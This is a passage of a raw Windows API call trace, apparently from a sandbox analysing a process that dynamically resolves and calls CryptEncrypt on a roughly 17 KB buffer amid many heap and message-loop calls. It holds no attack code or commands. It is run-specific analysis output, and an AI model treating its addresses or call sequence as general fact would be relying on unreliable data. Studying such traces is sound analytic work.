lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.994] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.995] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.995] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a70 [0185.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0185.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.996] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0185.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54378 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0185.997] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4323, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4328) returned 1 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0185.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0185.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0186.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0186.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0186.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0186.003] CharLowerBuffW (in: lpsz="byte[17192]", cchLength=0xb | out: lpsz="byte[17192]") returned 0xb [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f309a8 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0186.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0186.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.005] 